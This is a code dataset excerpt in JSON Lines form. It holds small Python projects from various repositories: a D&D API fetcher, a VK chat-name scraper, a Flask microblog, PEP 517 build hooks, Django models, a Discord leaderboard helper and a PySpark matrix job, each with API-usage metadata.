"call"}, {"api_name": "os.path", "line_number": 659, "usage_type": "attribute"}, {"api_name": "librosa.display.effects.trim", "line_number": 661, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 661, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 661, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 682, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 682, "usage_type": "call"}, {"api_name": "os.path", "line_number": 682, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 694, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 694, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 695, "usage_type": "call"}, {"api_name": "librosa.display.effects.trim", "line_number": 710, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 710, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 710, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 724, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 724, "usage_type": "call"}, {"api_name": "os.path", "line_number": 724, "usage_type": "attribute"}, {"api_name": "constants.base_data_path", "line_number": 743, "usage_type": "name"}, {"api_name": 
"constants.base_data_path", "line_number": 745, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 747, "usage_type": "call"}, {"api_name": "os.path", "line_number": 747, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 747, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 752, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 752, "usage_type": "call"}, {"api_name": "os.path", "line_number": 752, "usage_type": "attribute"}, {"api_name": "multiprocessing.cpu_count", "line_number": 753, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 756, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 757, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 759, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 782, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 783, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 784, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 789, "usage_type": "call"}, {"api_name": "os.path", "line_number": 789, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 790, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 792, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 792, "usage_type": "call"}, {"api_name": "os.path", "line_number": 792, "usage_type": "attribute"}, {"api_name": "librosa.display.load", "line_number": 805, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 805, "usage_type": "name"}, {"api_name": "librosa.display.effects.trim", "line_number": 807, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 807, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 807, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 818, "usage_type": "call"}, {"api_name": "os.path", "line_number": 818, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 819, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 820, "usage_type": "call"}, {"api_name": "os.path", "line_number": 820, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 822, "usage_type": "call"}, {"api_name": "os.path", "line_number": 822, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 844, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 862, "usage_type": "call"}, {"api_name": "os.path", "line_number": 862, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 864, "usage_type": "call"}, {"api_name": "os.path", "line_number": 864, "usage_type": "attribute"}, {"api_name": "soundfile.SoundFile", "line_number": 865, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 871, "usage_type": "call"}, {"api_name": "os.path", "line_number": 871, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 873, "usage_type": "call"}, {"api_name": "os.path", "line_number": 873, "usage_type": "attribute"}, {"api_name": "soundfile.SoundFile", "line_number": 874, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 885, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 890, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 901, "usage_type": "call"}, {"api_name": "os.path", "line_number": 901, "usage_type": "attribute"}, {"api_name": "joblib.delayed", "line_number": 911, "usage_type": "call"}, {"api_name": 
"joblib.Parallel", "line_number": 923, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 967, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 967, "usage_type": "call"}, {"api_name": "os.path", "line_number": 967, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 975, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 975, "usage_type": "call"}, {"api_name": "os.path", "line_number": 975, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 976, "usage_type": "call"}, {"api_name": "os.path", "line_number": 976, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 976, "usage_type": "call"}, {"api_name": "constants.base_data_path", "line_number": 977, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 983, "usage_type": "call"}, {"api_name": "librosa.display.load", "line_number": 984, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 984, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 984, "usage_type": "call"}, {"api_name": "os.path", "line_number": 984, "usage_type": "attribute"}, {"api_name": "librosa.display.effects.trim", "line_number": 988, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 988, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 988, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 1012, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1012, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1012, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 1014, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1014, "usage_type": "attribute"}, {"api_name": "constants.base_data_path", "line_number": 1014, "usage_type": "name"}, {"api_name": "os.mkdir", "line_number": 1015, "usage_type": "call"}, {"api_name": "constants.base_data_path", "line_number": 1015, "usage_type": "name"}, {"api_name": "numpy.save", "line_number": 1017, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1017, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1017, "usage_type": "attribute"}, {"api_name": "constants.base_data_path", "line_number": 1018, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 1031, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1031, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1031, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 1032, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1032, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1032, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 1039, "usage_type": "call"}, {"api_name": "librosa.display.load", "line_number": 1040, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 1040, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 1040, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1040, "usage_type": "attribute"}, {"api_name": "librosa.display.effects.trim", "line_number": 1044, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 1044, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 1044, "usage_type": "name"}, {"api_name": "librosa.display.feature.melspectrogram", "line_number": 1045, "usage_type": "call"}, {"api_name": "librosa.display.feature", "line_number": 1045, "usage_type": 
"attribute"}, {"api_name": "librosa.display", "line_number": 1045, "usage_type": "name"}, {"api_name": "constants.model_params", "line_number": 1047, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 1065, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1065, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1065, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 1067, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1067, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1067, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 1068, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1068, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1068, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 1070, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1070, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1070, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1083, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1083, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1084, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1084, "usage_type": "name"}, {"api_name": "os.walk", "line_number": 1090, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1093, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1093, "usage_type": "attribute"}, {"api_name": "pydub.AudioSegment.from_wav", "line_number": 1094, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 1094, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 1098, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1103, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 1110, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1111, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 1114, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1114, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 1122, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 1129, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 1135, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 1135, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 1166, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 1169, "usage_type": "call"}, {"api_name": "foundations.log_metric", "line_number": 1179, "usage_type": "call"}, {"api_name": "foundations.log_metric", "line_number": 1180, "usage_type": "call"}, {"api_name": "constants.model_params", "line_number": 1192, "usage_type": "name"}, {"api_name": "numpy.ceil", "line_number": 1208, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1216, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1228, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1230, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1232, "usage_type": "call"}]} +{"seq_id": "71567644649", "text": "import requests\r\nimport random\r\n\r\ndef monster():\r\n response2 = requests.get('http://www.dnd5eapi.co/api/monsters')\r\n a2 = response2.json()\r\n\r\n lista2 = a2['results']\r\n\r\n c = len(lista2) - 1\r\n monsters = []\r\n for item in lista2:\r\n 
monsters.append(lista2[c]['index'])\r\n c -= 1\r\n\r\n random_monster = random.choice(monsters)\r\n response3 = requests.get('http://www.dnd5eapi.co/api/monsters/'+ random_monster)\r\n d = response3.json()\r\n print('Name: {}, Type: {}, Hit points: {}, Hit dice: {}, Armor class: {}'.format(d['name'], d['type'], d['hit_points'], d['hit_dice'], d['armor_class']))\r\n\r\n\r\n\r\n", "repo_name": "Babalmar/D-D-Requests", "sub_path": "monsters.py", "file_name": "monsters.py", "file_ext": "py", "file_size_in_byte": 633, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 5, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 16, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "25705455774", "text": "from selenium import webdriver\r\nfrom time import sleep\r\nimport json\r\n\r\ndriver = webdriver.Chrome(r'C:\\\\chromedriver_95.0.4638.54.exe')\r\ndriver.get(\"https://vk.com\")\r\n\r\nauth = input(\"Press any key when you have login to your page...\")\r\ncount = int(input(\"Enter how a lot of chats you wanna check (number): \"))\r\nkeyword = input(\"Enter keyword to find if you want: \")\r\n\r\nchats = {}\r\nfor x in range(1, count+1):\r\n try:\r\n driver.get(f\"https://vk.com/im?sel=c{x}\")\r\n sleep(2)\r\n \r\n element = driver.find_element_by_xpath('//a[@class=\"im-page--title-main-inner _im_page_peer_name\"]')\r\n chatname = element.get_attribute(\"innerHTML\").replace(\" \",\"\")\r\n chats[x]=chatname\r\n \r\n if keyword in chatname:\r\n exit()\r\n \r\n x+=1\r\n except Exception:\r\n pass\r\nwith open(\"chats.json\",\"w\", encoding='utf8') as file:\r\n json.dump(chats,file,ensure_ascii=False)", "repo_name": "syaveloo/demonstration", "sub_path": "chats/give_me_my_chats_vk.py", "file_name": "give_me_my_chats_vk.py", "file_ext": "py", "file_size_in_byte": 934, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 5, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 5, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 16, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "37094566010", "text": "#This program prints one date minus of the date provided to the user.\n#Give input as\n#1\tno of testcases\n#24 April 1994\ttest cases\nimport datetime\nfrom datetime import date, timedelta\nn = input();\nwhile n > 0:\n\tdate = raw_input(); day, month, year = date.split();\n\tassert(int(day) > 0 & int(day) < 31)\n\t#print(day+\" \"+month+\" \"+year)\n\tmap = {'January':1, 'February':2, 'March':3, 'April':4, 'May':5, 'June':6, 'July':7, 'August':8, 'September':9, \t\t'October':10, 'November':11, 'December':12}\n\tmlist = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', \t\t\t'December']\n\tmydate = (datetime.date(int(year), map[month], int(day))) #year, month, day\n\t#mydate =mydate+datetime.timedelta(years=40)\n\tmydate = mydate - datetime.timedelta(days = 1)\n\tmydate = mydate.isoformat();\n\t#print(mydate)\n\tyear, month, day = mydate.split('-')\n\t#print(year+\" \"+month+\" \"+day)\n\t#print(mydate.strftime(\"%Y-%m-%d\"))\n\t#year = mydate.strftime(\"%Y\");\n\tif(int(month) < 10):\tmonth = month.strip(\"0\");\n\t#day = 
mydate.strftime(\"%d\");\n\tif(int(day) < 10):\tday = day.strip(\"0\")\n\t#print(month);\n\tprint(day + \" \" + mlist[int(month) - 1] + \" \" + year);\n\tn -= 1;\n", "repo_name": "pushkarlaulkar/competitiveprogramming", "sub_path": "printpreviousdate.py", "file_name": "printpreviousdate.py", "file_ext": "py", "file_size_in_byte": 1185, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.date", "line_number": 9, "usage_type": "name"}, {"api_name": "datetime.date.split", "line_number": 9, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "33753704375", "text": "# flaskr microblogging app\n\nimport dataset\n\nfrom flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash\n\n# connecting to a SQLite database\ndb = dataset.connect('sqlite:///myflaskr.db')\ntable = db['postings']\n\n# create the application\napp = Flask(__name__)\n\n# show all the posting\n\n\n@app.route(\"/\")\ndef show_postings():\n postings = table.find() # to reverse order, table.find(order_by='-id')\n return render_template('show_postings.html', postings=postings)\n\n\n@app.route(\"/add\", methods=['POST']) # only accept connections which POST\ndef add_posting():\n table.insert(dict(title=request.form['title'], text=request.form['text']))\n flash(\"New posting successful\")\n return redirect(url_for('show_postings'))\n\nif __name__ == '__main__':\n app.debug = \"TRUE\"\n app.secret_key = \"secret\"\n app.run()\n", "repo_name": "oatnog/flaskr", "sub_path": "flaskr.py", "file_name": "flaskr.py", "file_ext": "py", "file_size_in_byte": 848, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dataset.connect", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "23876414383", "text": "#qzznb!\nfrom __future__ import print_function\nfrom pyspark import SparkContext\nimport json\ndef fun(record):\n if record[0] == 'a':\n return (record[2],record)\n elif record[0] == 'b':\n return (record[1],record)\n\ndef mul(lists):\n sz = len(lists)\n res = []\n for x in range(sz):\n for y in range(x+1,sz):\n #print(x,y)\n #print(lists[x][0],lists[y][0])\n \n if lists[x][0] == \"a\" and lists[y][0] == \"b\":\n res.append(((lists[x][1],lists[y][2]),lists[x][3]*lists[y][3]))\n elif lists[x][0] == \"b\" and lists[y][0] == \"a\":\n res.append(((lists[y][1],lists[x][2]),lists[x][3]*lists[y][3]))\n \n return res\n\nsc = SparkContext('local', 'test')\ntextFile = sc.textFile(\"file:///root/bigdata/inputs//6.json\")\nans = textFile.map(lambda row: fun(json.loads(row))).groupByKey().flatMap(lambda x: mul(list(x[1]))).reduceByKey(lambda x,y:x+y).map(lambda x: [[x[0][0],x[0][1]],x[1]])\nans.foreach(print)\n", "repo_name": "Ryan0v0/BUAA_BigDataCourse", "sub_path": "problem6/pyspark/problem6_spark.py", "file_name": 
"problem6_spark.py", "file_ext": "py", "file_size_in_byte": 1007, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pyspark.SparkContext", "line_number": 26, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "21651703787", "text": "from helper.cEmbed import granted_msg, denied_msg\n\nclass LeaderBoard():\n def Standings(self, lst):\n i = 1\n ids = handles = ratings = \"\"\n for (h, r) in sorted(lst, key = lambda x: x[1], reverse = True):\n ids += \"**\" + str(i) + \"**\" +'\\n'\n if i == 1: handles += h + \":crown:\" + \"\\n\"\n else: handles += h + \"\\n\"\n ratings += str(r) + \"\\n\"\n i += 1\n\n if len(ids) == 0: return denied_msg(\"Warning\", \"The Leaderboard is Still Empty.\")\n\n response = granted_msg(\"CodeForces Standings\")\n\n response.add_field(name = \"#\", value = ids, inline = True)\n response.add_field(name = \"Handle\", value = handles, inline = True)\n response.add_field(name = \"Rating\", value = ratings, inline = True)\n\n return response\n", "repo_name": "KhaledChehabeddine/aub_cp_discord_bot", "sub_path": "helper/LeaderBoard.py", "file_name": "LeaderBoard.py", "file_ext": "py", "file_size_in_byte": 812, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "helper.cEmbed.denied_msg", "line_number": 14, "usage_type": "call"}, {"api_name": "helper.cEmbed.granted_msg", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "4931263659", "text": "import random\nimport string\n\nfrom django.db import models\nfrom django.contrib.auth.models import AbstractUser, UserManager\n\n\nclass AdminManager(UserManager):\n def get_queryset(self):\n return super().get_queryset().filter(is_superuser=True)\n\n\nclass User(AbstractUser):\n class Type(models.IntegerChoices):\n USER = 0, 'Пользователь без прав'\n VERIFIED = 1, 'Пользователь'\n ADMIN = 2, 'Администратор'\n\n users = UserManager()\n admins = AdminManager()\n type = models.IntegerField(default=Type.USER, choices=Type.choices)\n date_of_birth = models.DateField(null=True)\n token = models.CharField(max_length=255, default='')\n\n def update_token(self):\n token = str()\n for _ in range(20):\n token += random.choice(string.ascii_letters+string.digits)\n\n self.token = token\n self.save()\n\n def __str__(self):\n return str(self.username)\n\n\nclass Platform(models.Model):\n platforms = models.Manager()\n name = models.CharField(\n max_length=255,\n unique=True,\n verbose_name='Название',\n )\n created = models.DateTimeField(auto_now_add=True,\n verbose_name='Дата создания')\n updated = models.DateTimeField(auto_now=True,\n verbose_name='Дата изменения')\n\n class Meta:\n verbose_name = 'Платформа'\n verbose_name_plural = 'Платформы'\n\n def __str__(self):\n return self.name\n\n\nclass Category(models.Model):\n platform = models.ForeignKey(\n to=Platform,\n on_delete=models.CASCADE,\n related_name='categories',\n verbose_name='Платформа',\n )\n name = models.CharField(\n max_length=255,\n unique=True,\n verbose_name='Название',\n )\n description = models.CharField(\n max_length=255,\n verbose_name='Описание категории',\n null=True,\n blank=True,\n )\n parent = models.ForeignKey(\n to='self',\n on_delete=models.CASCADE,\n related_name='children',\n null=True,\n blank=True,\n verbose_name='Родитель',\n )\n xml_feed = models.CharField(\n max_length=255,\n verbose_name='Значение для XML фида',\n null=True,\n blank=True,\n 
)\n created = models.DateTimeField(auto_now_add=True,\n verbose_name='Дата создания')\n updated = models.DateTimeField(auto_now=True,\n verbose_name='Дата изменения')\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n def get_full_name(self):\n name_list = [self.name]\n parent = self.parent\n while parent:\n name_list.append(parent.name)\n parent = parent.parent\n\n full_name = ' - '.join(reversed(name_list))\n return full_name\n\n def __str__(self):\n return self.name\n\n\nclass Project(models.Model):\n uid = models.IntegerField()\n projects = models.Manager()\n platform = models.ForeignKey(\n to=Platform,\n on_delete=models.CASCADE,\n related_name='projects',\n )\n user = models.ForeignKey(\n to=User,\n on_delete=models.CASCADE,\n related_name='projects',\n )\n name = models.CharField(max_length=255, verbose_name='Название')\n created = models.DateTimeField(auto_now_add=True,\n verbose_name='Дата создания')\n updated = models.DateTimeField(auto_now=True,\n verbose_name='Дата изменения')\n\n class Meta:\n verbose_name = 'Проект'\n verbose_name_plural = 'Проекты'\n\n def __str__(self):\n return self.name\n\n\nclass ProjectCategory(models.Model):\n project = models.ForeignKey(\n to=Project,\n on_delete=models.CASCADE,\n related_name='categories',\n )\n category = models.ForeignKey(Category, on_delete=models.CASCADE)\n\n created = models.DateTimeField(auto_now_add=True,\n verbose_name='Дата создания')\n updated = models.DateTimeField(auto_now=True,\n verbose_name='Дата изменения')\n", "repo_name": "archon1999/PlatformXMLGenerator", "sub_path": "app/apps/backend/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 4445, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.auth.models.UserManager", "line_number": 8, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.AbstractUser", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.models.IntegerChoices", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.UserManager", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models.IntegerField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.DateField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 28, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 28, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.db.models.Model", "line_number": 37, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 37, "usage_type": "name"}, {"api_name": "django.db.models.Manager", "line_number": 38, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 38, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 39, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 44, 
"usage_type": "call"}, {"api_name": "django.db.models", "line_number": 44, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 46, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 46, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 57, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 57, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 58, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 58, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 60, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 60, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 64, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 64, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 69, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 69, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 75, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 75, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 77, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 77, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 83, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 83, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 89, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 89, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 91, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 91, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 112, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 112, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 113, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 113, "usage_type": "name"}, {"api_name": "django.db.models.Manager", "line_number": 114, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 114, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 115, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 115, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 117, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 117, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 120, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 120, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 122, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 122, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 125, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 125, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 126, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 126, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 128, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 128, "usage_type": "name"}, {"api_name": 
"django.db.models.Model", "line_number": 139, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 139, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 140, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 140, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 142, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 142, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 145, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 145, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 145, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 147, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 147, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 149, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 149, "usage_type": "name"}]} +{"seq_id": "34046069669", "text": "\"\"\"\nPEP 517 build hooks\n\"\"\"\n\n\nfrom __future__ import annotations\nfrom typing import Mapping, Any\nimport os\nimport setuptools.build_meta as build_meta\n\n__all__ = [\n \"_supported_features\",\n \"build_sdist\",\n \"build_wheel\",\n \"build_editable\",\n \"get_requires_for_build_sdist\",\n \"get_requires_for_build_wheel\",\n \"get_requires_for_build_editable\",\n \"prepare_metadata_for_build_wheel\",\n \"prepare_metadata_for_build_editable\",\n]\n\nfrom pathlib import Path\nfrom loguru import logger\n\nfrom .project import Project\n\n\ndef _supported_features():\n return [\"build_editable\"]\n\n\ndef build_sdist(\n sdist_directory: str,\n config_settings: dict[str, list[str] | str] | None = None,\n) -> str:\n logger.debug(\"Build hook: build_sdist\")\n return build_meta.build_sdist(sdist_directory, config_settings)\n\n\ndef build_wheel(\n wheel_directory: str,\n config_settings: dict[str, list[str] | str] | None = None,\n metadata_directory: str | None = None,\n) -> str:\n logger.debug(\"Build hook: build_wheel\")\n logger.debug(f\"wheel_directory: {wheel_directory}\")\n project = Project(Path.cwd())\n return project.build_wheel(wheel_directory, config_settings, metadata_directory)\n\n\ndef build_editable(\n wheel_directory: str,\n config_settings: dict[str, list[str] | str] | None = None,\n metadata_directory: str | None = None,\n) -> str:\n logger.debug(\"Build hook: build_editable\")\n logger.debug(f\"wheel_directory: {wheel_directory}\")\n # If not invoked indirectly by cxbuild itself do the default action\n if not os.environ.get('CBX_ACTIVITY'):\n return build_meta.build_editable(wheel_directory, config_settings, metadata_directory)\n return build_wheel(wheel_directory, config_settings, metadata_directory)\n\n\ndef get_requires_for_build_sdist(\n config_settings: dict[str, str | list[str]] | None = None # noqa: ARG001\n) -> list[str]:\n logger.debug(\"Build hook: get_requires_for_build_sdist\")\n return build_meta.get_requires_for_build_sdist(config_settings)\n\n\ndef 